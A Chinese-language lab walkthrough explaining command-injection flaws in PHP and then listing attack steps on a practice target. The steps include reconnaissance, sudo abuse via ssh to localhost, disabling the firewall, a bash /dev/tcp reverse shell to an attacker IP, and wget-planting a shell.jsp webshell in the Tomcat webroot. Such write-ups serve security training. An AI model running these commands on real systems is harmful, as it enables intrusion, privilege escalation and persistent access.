命令执行

当应用需要调用一些外部程序去处理内容的情况下，就会用到一些执行系统命令的函数。如php中的system、exec、shell_exec等，如果用户可以控制命令执行函数中的参数时，将可以注入恶意系统命令到正常的命令中，造成命令执行漏洞。

• 应用调用执行系统命令的函数
• 将用户输入作为系统命令的参数拼接到了命令行中

靶机109攻击机105

高危漏洞

网站根目录

查看临时缓冲目录：ls -alh /tmp/

查看Home目录，挖掘用户信息:ls -alh /home/

查看具体用户的目录：ls -alh /home/用户名

查看系统信息:uname -a

ubuntu系统有防火墙

利用ssh 命令 执行root 用户权限

使用ssh用户名@localhost通过ssh登陆服务器是不需要身份验证的

查看bill用户sudo命令的权限 ssh [email protected] sudo -l

关闭防火墙：ssh [email protected] sudo ufw disable

反弹shell

攻击机启动监听netcat

nc -nlvp 4444

靶机反弹shell 

ssh [email protected] sudo bash -i >& /dev/tcp/192.168.1.106/4444 0>&1

ssh [email protected] sudo bash -i 交互型模式>& /dev/tcp/ tcp协议反弹给攻击机ip/端口4444 0>&1

渗透测试技巧

开启python简易http服务器

python -m SimpleHTTPServer

利用命令执行下载木马文件

ssh [email protected] sudo wget "http://ip:port/shell.jsp" -O /var/lib/tomcat8/webapps/ROOT/shell.jsp

cd /root/

ls

 cat flag